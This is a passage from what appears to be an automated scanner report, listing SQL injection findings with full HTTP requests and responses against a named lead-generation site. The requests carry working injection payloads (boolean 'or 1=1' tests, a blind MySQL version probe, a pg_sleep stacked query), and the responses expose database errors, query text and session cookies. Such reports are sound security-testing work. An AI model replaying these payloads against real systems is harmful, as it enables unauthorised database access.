Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:37:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Inbound Call Center Service, Use InsideUp to Get Quotes and Compare Call Center Vendors. </title>
   <meta name="description" content="Let inbound call centers providers compete for your telemarketing needs. Compare call center services from leading inbound call center vendors."/>
   <meta name="keywords" content=" nbound call center solution, call center inbound service, inbound call center solutions, call center inbound, inbound call center, inbound call centers "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 10    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Blo
...[SNIP]...

1.166. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_343_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_343_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:08:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ps96pg77vvb674d2qahu1f1tr7; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=1928__Take sales orders&attributeId_394=1939__Not sure&attributeId_395=1947__' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9''&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:08:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=tg8ljpqprdsp78ulp52i9hf7v4; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.167. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_343_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. The payloads 27466083'%20or%201%3d1--%20 and 27466083'%20or%201%3d2--%20 were each submitted in the attributeId_343_g parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-927466083'%20or%201%3d1--%20&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:40:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-927466083'%20or%201%3d2--%20&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:40:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Inbound Call Center Service, Use InsideUp to Get Quotes and Compare Call Center Vendors. </title>
   <meta name="description" content="Let inbound call centers providers compete for your telemarketing needs. Compare call center services from leading inbound call center vendors."/>
   <meta name="keywords" content=" nbound call center solution, call center inbound service, inbound call center solutions, call center inbound, inbound call center, inbound call centers "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 10    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Blo
...[SNIP]...

1.168. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_344_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR'&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:08:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kumt6hp8m5ki2ikj9td0hovjm1; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=1928__Take sales orders&attributeId_394=1939__Not sure&attributeId_395=1947__' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR''&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:08:53 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=8fltnbfqh1olelq6aq72p8lvt5; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.169. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_344_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. The payloads 58917606'%20or%201%3d1--%20 and 58917606'%20or%201%3d2--%20 were each submitted in the attributeId_344_g parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR58917606'%20or%201%3d1--%20&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:40:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR58917606'%20or%201%3d2--%20&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
